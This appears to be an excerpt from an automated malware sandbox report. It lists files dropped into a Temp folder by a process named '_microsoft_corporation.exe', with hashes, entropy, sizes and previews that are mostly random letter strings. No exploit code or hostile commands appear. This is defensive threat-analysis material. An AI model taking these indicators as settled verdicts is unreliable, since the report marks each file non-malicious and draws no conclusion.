                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):282
                                                          Entropy (8bit):3.514693737970008
                                                          Encrypted:false
                                                          SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                          MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                          SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                          SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                          SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.702896917219035
                                                          Encrypted:false
                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                          Malicious:false
                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694985340190863
                                                          Encrypted:false
                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                          Malicious:false
                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694985340190863
                                                          Encrypted:false
                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                          Malicious:false
                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.696250160603532
                                                          Encrypted:false
                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                          Malicious:false
                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.700014595314478
                                                          Encrypted:false
                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                          Malicious:false
                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694982189683734
                                                          Encrypted:false
                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                          Malicious:false
                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
